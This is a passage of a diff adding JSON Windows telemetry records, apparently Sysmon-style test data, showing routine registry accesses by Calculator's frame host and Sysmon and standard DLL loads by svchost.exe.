"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColorInactive", + "registry_value": "ButtonBackgroundColorInactive", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColorInactive", + "registry_value": "ButtonForegroundColorInactive", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250580000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250730000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "wldp.dll", + "image_path": "C:\\Windows\\System32\\wldp.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "crypt32.dll", + "image_path": "C:\\Windows\\System32\\crypt32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "msasn1.dll", + "image_path": "C:\\Windows\\System32\\msasn1.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "image_load", + "image_name": "wintrust.dll", + "image_path": "C:\\Windows\\System32\\wintrust.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "CapabilityAccessManager.dll", + "image_path": "C:\\Windows\\System32\\CapabilityAccessManager.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonBackgroundColor", + "registry_value": "ButtonBackgroundColor", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "image_load", + "image_name": "clbcatq.dll", + "image_path": "C:\\Windows\\System32\\clbcatq.dll", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573250890000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonForegroundColor", + "registry_value": "ButtonForegroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverBackgroundColor", + "registry_value": "ButtonHoverBackgroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 5652, + "process_name": "ApplicationFrameHost.exe", + "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\PersistedTitleBarData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\ButtonHoverForegroundColor", + "registry_value": "ButtonHoverForegroundColor", + "timestamp": 131883573251050000, + "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" + }, + { + "event_type": "registry", + "pid": 